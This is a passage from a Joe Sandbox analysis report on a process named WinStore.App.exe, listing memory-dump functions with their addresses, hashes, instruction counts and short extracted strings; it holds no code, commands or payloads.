Source File: 00000011.00000002.2433289815.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction ID: e34d440b4395e0adaff83f4cc2dfa248a664263bf99d975a8ac6ecc622f1b240
Opcode Fuzzy Hash: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction Fuzzy Hash: D1C08C22D1F50B09F401B32E34060BCB9006BC4390FD00032CC0C800C1BE0F20C5015E

Function 00007FF848F212D8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2433289815.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction ID: f9ce91c8fa565d03df266f0b630e85e038e808413b4854231ee7f264fea6c9c7
Opcode Fuzzy Hash: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction Fuzzy Hash: E8C04C345558498FC948FB29D88991477A0FB59215BD500A0E409C71B1D66AECD5C745

Function 00007FF84931322B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437520067.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6c852c1690989550c2f07d973ebc65c7ec7e72967100e909e6a1528f7dfc5d
Instruction ID: 69c4f07857cda70d8be56900483b7c535ce4142ef9dce9be28bb4b472257c716
Opcode Fuzzy Hash: cc6c852c1690989550c2f07d973ebc65c7ec7e72967100e909e6a1528f7dfc5d
Instruction Fuzzy Hash: 5FD0C930A0C5D38DF7397E05C02233A65905F07BC0E60603EC0DF458E2EE1C7502620A

Function 00007FF848F2251B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2433289815.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde1bfa1035214b81f800e856b5e400f4fec1b146d4fef3ed3fb2c6011ed9b50
Instruction ID: 074870ffb27886da836ef79d21d0dc0c54b776bfd415abe7f305d03a94367a9b
Opcode Fuzzy Hash: fde1bfa1035214b81f800e856b5e400f4fec1b146d4fef3ed3fb2c6011ed9b50
Instruction Fuzzy Hash: F7C04C21F1D81626E655B758541177F08539B44784F541074E00DD67CBCE4E6E5512CA

Function 00007FF848F206C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2433289815.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction ID: 8bcad308f30d77252d6e0c1a3b3c5e27abe4c894dda14cdba7da6809652b3e79
Opcode Fuzzy Hash: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction Fuzzy Hash: 58B01210C6E40F04E404337A3842079B4406B84340FC00070DC0D801C5A94F1194025A

Function 00007FF84931273F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437520067.00007FF849310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff849310000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb799c7480be998f05271e5898cba1c5d7f2a2266011d8ec2b7c26102979190
Instruction ID: f6a6b72c669000eeb7695b7bfc188a1ec2dcb6a8c358da7177514a5a3df23ebb
Opcode Fuzzy Hash: 9bb799c7480be998f05271e5898cba1c5d7f2a2266011d8ec2b7c26102979190
Instruction Fuzzy Hash: 77C09B50F0D3C35FE735797408D207D16815F17280B552572D16E851E3FD4C68065315

Non-executed Functions

Function 00007FF848F209B0 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF848F20B3E
!k9, xrefs: 00007FF848F20B4E
"s9, xrefs: 00007FF848F20B46
c9, xrefs: 00007FF848F20B56

Memory Dump Source

Source File: 00000011.00000002.2433289815.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff848f20000_WinStore.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 96f46e459f312e44fb5fcadeb04ad77816967ff359be1cfa5d86e3b961bf2fe8
Instruction ID: e6f65269168a09fcc3169cccb2755df1515ffe13d1c905b656bdb52714ca1ee5
Opcode Fuzzy Hash: 96f46e459f312e44fb5fcadeb04ad77816967ff359be1cfa5d86e3b961bf2fe8
Instruction Fuzzy Hash: 55515E17A2F562AAE25137BDB4011EA5BA4EF852FDF484777E14C8D0C38E0D648682FD

Analysis Process: WinStore.App.exePID: 5228, Parent PID: 1632COMMON

Executed Functions

Function 00007FF848F406B6 Relevance: 2.8, Strings: 1, Instructions: 1507COMMON

Download Yara Rule

Strings

L_H, xrefs: 00007FF848F417EF

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f40000_WinStore.jbxd

Similarity

API ID:
String ID: L_H
API String ID: 0-4018862940
Opcode ID: 5a0fb564662ad516167f47516d6580ba10a4db6d3c5a0e1f2a548d1a7e91d53f
Instruction ID: e0c91afdba5b794969a7ba8941eeb3e9fb62a657391a464a34e28072c30a88c3
Opcode Fuzzy Hash: 5a0fb564662ad516167f47516d6580ba10a4db6d3c5a0e1f2a548d1a7e91d53f
Instruction Fuzzy Hash: 57B27431E1C91A9FEB94FB2884557B573A2FFA4780F1445BAD40DD32C6DF28AC828785

Function 00007FF84932E5A4 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

;_H, xrefs: 00007FF84932E970

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID: ;_H
API String ID: 0-1267907542
Opcode ID: 249d62f4295a5f6f1884429ec0435840b10ac3ef881dac65c2d589db0deffa79
Instruction ID: 827a46831a94b282237bf2e8dc578cdfdd8abd4b24945ebd54c188a0f97a4e60
Opcode Fuzzy Hash: 249d62f4295a5f6f1884429ec0435840b10ac3ef881dac65c2d589db0deffa79
Instruction Fuzzy Hash: 2BD18331E1C9594FE7A8FB2C945A6B973D2EF99790F4411BAD40EC32C2DE287C428781

Function 00007FF848F30D48 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FF848F30DF3

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: bde0844036431d5936e43009311a07753cc94466dbd1c0b9435681ebaac60f7e
Instruction ID: 349cae94aec8e53a86c5264dbd955c53cda4184f474c7578ffdc67633ece0bb6
Opcode Fuzzy Hash: bde0844036431d5936e43009311a07753cc94466dbd1c0b9435681ebaac60f7e
Instruction Fuzzy Hash: 8D91BF71E1DA898FE789EB2888693A97FE1FB96351F4001BBC049D72D2CF7928118715

Function 00007FF848F30E43 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4291d81969fcb99cae5306e7fe628d2ffc2aab2ef064cad476b1489d53c3136e
Instruction ID: 9b53565cd21f87e883104625f3cf70f90683ff96d41107a9b35cf104ead63e7e
Opcode Fuzzy Hash: 4291d81969fcb99cae5306e7fe628d2ffc2aab2ef064cad476b1489d53c3136e
Instruction Fuzzy Hash: 06519B71A19A498EE788EB28D8693A97FE1FB89351F9002BFC00DD37D5CB7924118704

Function 00007FF848F6339D Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F63346
@aH, xrefs: 00007FF848F63458

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: @aH$M
API String ID: 0-2096102131
Opcode ID: 30fc4ff9dea90fd0c7d72f493230cef52f6e32cf4ddd2ccede5df26059f82523
Instruction ID: 9ef8655f87371aa2ee3969597510d02e454996b99c7d6e8704c2b0f5c55f6784
Opcode Fuzzy Hash: 30fc4ff9dea90fd0c7d72f493230cef52f6e32cf4ddd2ccede5df26059f82523
Instruction Fuzzy Hash: 2491BE31E1D98A5FE688FB2C84562B5B3D1EF95380F0452B9C40ED72C7DE2DA8878745

Function 00007FF849321AAB Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

(.I, xrefs: 00007FF849321AEE

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID: (.I
API String ID: 0-2083108193
Opcode ID: fd757bc66ce779bfbf2525858eaf96e7560515e37bba52b87bc01ed5d1dcc56e
Instruction ID: b6de22f07c6289d617cdc7fa59a93f7ef8ce64c0c8de38bc7f2d0255bdb8b669
Opcode Fuzzy Hash: fd757bc66ce779bfbf2525858eaf96e7560515e37bba52b87bc01ed5d1dcc56e
Instruction Fuzzy Hash: ED818130D1D58A9EE7A5EFE48554ABD7BF1FF46380F101579D00EC7192EA286C418751

Function 00007FF849323D52 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FF849323DC2

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c39ce9c4bff1e06dd9ca9c05140d8e374a426abb51c78c86c1fe53e403739eac
Instruction ID: 4717bb11790d8dd6023647f6a0ac629825e8d6911f9eb9933673b1b219a42d07
Opcode Fuzzy Hash: c39ce9c4bff1e06dd9ca9c05140d8e374a426abb51c78c86c1fe53e403739eac
Instruction Fuzzy Hash: 67516B31D0D68E9FEB59EFA8D4545BDBBB1FF49740F1044BAC00AEB286CA386905CB51

Function 00007FF848F6E321 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

0zH, xrefs: 00007FF848F6E3C4

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: 0zH
API String ID: 0-1873325940
Opcode ID: e46f633a982ca592af906145b0c5cfe95e12f20a9374d3fc3ac97686f4f900c9
Instruction ID: 26201f0c8a6193eed97953ea9a5f205c33bfa7861847a6df16120fa2f6cd362f
Opcode Fuzzy Hash: e46f633a982ca592af906145b0c5cfe95e12f20a9374d3fc3ac97686f4f900c9
Instruction Fuzzy Hash: 4621A232E1C91A4FE794F718D459AB873A2EB947A0F14077AC40AE32D5CF286C838784

Function 00007FF848F6A589 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F6A5A6

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 86f3394ac5698ee5f3ad3902896cfcb8bc4d6ae60e54cc086837e61232f15de2
Instruction ID: 9536eb16c8d0fea44e5c36a4ed5911b7be6d7681ac080e1597f6c985384cde0f
Opcode Fuzzy Hash: 86f3394ac5698ee5f3ad3902896cfcb8bc4d6ae60e54cc086837e61232f15de2
Instruction Fuzzy Hash: 8FF06571A0E7C44FC71AEB3484694547FA0EF6721174A52EEC045CF1A3EB2D8886CB01

Function 00007FF848F62F09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F62F26

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a2930ba56d7aff269278ee379f21d73c811e344c53d3d93bb80a24c638244710
Instruction ID: 8ad29aa8817c90425e5848afb37f5a90a714243db3a78214a619a79a745cb2dc
Opcode Fuzzy Hash: a2930ba56d7aff269278ee379f21d73c811e344c53d3d93bb80a24c638244710
Instruction Fuzzy Hash: 54F0ED3060E3C44FC74AAB348869454BFA0EF6720074A42EEC046CF1A7EA2E8886C700

Function 00007FF848F61C39 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F61C56

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 2caeb01b6ac837416cbc7f2048a2aa87df7349160a24a79264757a2ed9b018f2
Instruction ID: 98c300ed4980577cea59abdf7011f6bb56965edc6b765da0c95d89cc95fb91d6
Opcode Fuzzy Hash: 2caeb01b6ac837416cbc7f2048a2aa87df7349160a24a79264757a2ed9b018f2
Instruction Fuzzy Hash: 35F0657190E3C44FC756E7344869455BFA0EF6721174951EEC086CF1A7EA2D9885C701

Function 00007FF848F436D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F436F6

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f40000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: ba651bb9563b214bd305eb69ec87b7157b9b3441413dcd524483f5d950fdf2fa
Instruction ID: ac0423ba78f8ec62c32b183bec341c0b830309248a4eb32260c6f47fd2a16d14
Opcode Fuzzy Hash: ba651bb9563b214bd305eb69ec87b7157b9b3441413dcd524483f5d950fdf2fa
Instruction Fuzzy Hash: 39E06D71A0E7C04FCB16AA388869854BFA0EF6721174A41EFC046CF1A7EA2D8889C701

Function 00007FF848F6A619 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F6A636

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a8ec9c4fd7f5d7de72d5cc63522a2182f123f23e5189984d8d4062ac14263260
Instruction ID: fc04791c7e5cc8b427c50b8cdc6aec675fbdc4dca22fb354c2898d792ce895b2
Opcode Fuzzy Hash: a8ec9c4fd7f5d7de72d5cc63522a2182f123f23e5189984d8d4062ac14263260
Instruction Fuzzy Hash: 20E06D7160E7C44FC71AAB34886D454BFA0EF6721174A52EEC045CF1A7EA2D8889C701

Function 00007FF848F6E789 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848F6E7A6

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: cda7b25713e189580cfda09806167eb3b8a3ed7b134803f7fd7167d8a7d90798
Instruction ID: fec4ae8a3169d9be43f4b2b2dd278c8372861ba34748ebc4542e72cac020c101
Opcode Fuzzy Hash: cda7b25713e189580cfda09806167eb3b8a3ed7b134803f7fd7167d8a7d90798
Instruction Fuzzy Hash: DEE06D7190E7C44FC71AAA348869454BFA0EF6721174E52EFC049CF1A7EA2D8889C701

Function 00007FF848F61CC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F61CE6

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: c23d57c9d6c5f4e76cae828d897c51e8c5ac9c223493e8cc400a6a3467a6f663
Instruction ID: e0a3923ae4dc0b4341068699d03eaadd4cbfee50684b1fe25580638f5ade4a80
Opcode Fuzzy Hash: c23d57c9d6c5f4e76cae828d897c51e8c5ac9c223493e8cc400a6a3467a6f663
Instruction Fuzzy Hash: 87E06D7180E3C04FCB0AEB3888658443F60AE6725078A41EEC045CF0A3E6198889C701

Function 00007FF848F63D89 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F63DA6

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 76da5a4095e74dba21e2074f4df113a15455c01c23144f3beebc317c9d6a6f25
Instruction ID: 0963691b26c09b74ca4b87f8c11d1d6b1c2f5926211a184594a5417092b26bec
Opcode Fuzzy Hash: 76da5a4095e74dba21e2074f4df113a15455c01c23144f3beebc317c9d6a6f25
Instruction Fuzzy Hash: 9EE0E57184E7D44FCB5AAB34886A8953FA0AE6731178A41EEC14ACF1E3E6298849C701

Function 00007FF848F6AB19 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F6AB36

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 044328fc411af440ccf73d715b3d80943ce0ad93be37b31d49a0643b8ae0203e
Instruction ID: e99bd6d09b9b62789277be385ead2efde107eb96044b9403dc48306238df56a2
Opcode Fuzzy Hash: 044328fc411af440ccf73d715b3d80943ce0ad93be37b31d49a0643b8ae0203e
Instruction Fuzzy Hash: 43E012B194E3C04FC706EB3488659543F61EE6725174A45DEC146CF1B3E61D8855C701

Function 00007FF848F68199 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848F681B6

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 9323e55dd9505f411d451ad1698de45356ddbbfe1bd451880ef1fa48aea2b657
Instruction ID: 1a3839dab54faafb0de9a3cc4741e9eb54a1525adc37f46c7f304a8dbf9a7e67
Opcode Fuzzy Hash: 9323e55dd9505f411d451ad1698de45356ddbbfe1bd451880ef1fa48aea2b657
Instruction Fuzzy Hash: 4FE01A7144A3C04FCB06AB3488659457FA0EE6725078A40EEC145CF1A3E62D8849C701

Function 00007FF849323FBF Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb1bb30cef8377ab496dd35a45a365ea073a14b56cef492cbf3e28cba16b3d8c
Instruction ID: 266f6f667bb32f209745eb079d710cf276ad66e3827e4e8708c56d7261ffa07f
Opcode Fuzzy Hash: fb1bb30cef8377ab496dd35a45a365ea073a14b56cef492cbf3e28cba16b3d8c
Instruction Fuzzy Hash: 8AF1BE3091C6958FEB59DF18C4D46B57BA1FF46300F5451BDC84ECB68ACA38E892CB81

Function 00007FF849325001 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8b421cc9f51a26768f6e91ee4551073b30895ecede227f61a1691952e0e229
Instruction ID: f81e90014ba45972f8191b4a679a456c931d25c9e1dacd1c6fb99953fa7d3a8a
Opcode Fuzzy Hash: 2b8b421cc9f51a26768f6e91ee4551073b30895ecede227f61a1691952e0e229
Instruction Fuzzy Hash: 79D1F130A0DB868FE379EF28D491575B7E1FF46340F24297EC48AC76D2DA29B9428741

Function 00007FF849323FDF Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f5aa8015bb5f3c59931733227813b839cfef6200e769642207689f8cc44f3d5
Instruction ID: f6288c36d8653a2a74d54a8f03da834dcc7e6b428cf2dbf8469c0c66c8f0460a
Opcode Fuzzy Hash: 4f5aa8015bb5f3c59931733227813b839cfef6200e769642207689f8cc44f3d5
Instruction Fuzzy Hash: DCC1AD3051C6868FEB1DDF18D4D85B13BA1FF46350B6455BDC94B8B68ACA38F892CB81

Function 00007FF849323872 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07202db7e410ba6f275481e4e50263ea3361bfc6ff1f0545a73c8e44783c52e0
Instruction ID: 786d7d76e2b05aebc4a8c6c303182414ea299852fc6f334a9f0881c0f7582ba7
Opcode Fuzzy Hash: 07202db7e410ba6f275481e4e50263ea3361bfc6ff1f0545a73c8e44783c52e0
Instruction Fuzzy Hash: E8B1F83090DA869FE759EF28C4916B4B7E1FF46740F445179D04ECBA87CB28B851C792

Function 00007FF849321237 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f93db9b44ada38cdeb42f54333527dcf9ffc48f6942a740ffba54b8b022949
Instruction ID: 265f0f7e30fbc987c1602d8381580a7c33dd50fbb2c8719f657c1456ecb2fde8
Opcode Fuzzy Hash: 70f93db9b44ada38cdeb42f54333527dcf9ffc48f6942a740ffba54b8b022949
Instruction Fuzzy Hash: CB21B436D1D1D79EF6757DE836228FB16609F537A4F2922B7D04DCA0C2CC0D2D855292

Function 00007FF84932D251 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc136f52c4efa32eed9133b6b86ac2aa5ab48fc371ddd5660ae221051fe9d260
Instruction ID: dbf725f954321d2fa3cc2f89d9c885c9b09eae4841d83aa4bb4f3b6cf00fcd40
Opcode Fuzzy Hash: dc136f52c4efa32eed9133b6b86ac2aa5ab48fc371ddd5660ae221051fe9d260
Instruction Fuzzy Hash: 43610531D1C6CA4FE369AB2898562B57BE0EF57340F1800BED45AC71D3EE2CB8468781

Function 00007FF849320EFD Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc17dcc31d5e662debeaa1005cbc3d8a3e1a196adab5956b08c658068fb11636
Instruction ID: e915f1f0893ccea65075d3ad6ffa92327d59cccc819511f0303fceceda42168b
Opcode Fuzzy Hash: fc17dcc31d5e662debeaa1005cbc3d8a3e1a196adab5956b08c658068fb11636
Instruction Fuzzy Hash: 9261263590C5C94FE7B8EF98C8469B977D0FF46391F0452B9D09EC75A2DE28AC0A8781

Function 00007FF848F6D0B0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869c64125b8fc00c815e0479f0e1e29545365b2db1deb935b8e5d7fe413f5a7b
Instruction ID: d6a2aba4329db25265d232e0cb99ebc166f2e4f7dbc61de814878e0a6f769533
Opcode Fuzzy Hash: 869c64125b8fc00c815e0479f0e1e29545365b2db1deb935b8e5d7fe413f5a7b
Instruction Fuzzy Hash: B0516132E0C94A8FEB58EB5898556BD77E2FF98345F280269D009E32C2DB285802C755

Function 00007FF848F63465 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2523497219.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f61000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 518038da70b84af5b598e26c93e6295bde82b40d862f6809ae201281c8310170
Instruction ID: 180329146cd349ea79a5e6a3d3fde4c4b0cfbed75ef640921dc532a5c82cfdd2
Opcode Fuzzy Hash: 518038da70b84af5b598e26c93e6295bde82b40d862f6809ae201281c8310170
Instruction Fuzzy Hash: 2A51AE31E1C95A5FE688FB2C84566B9B2D1EF98380F044279D40ED32C7EE2DA8468385

Function 00007FF849322DF4 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2528134116.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
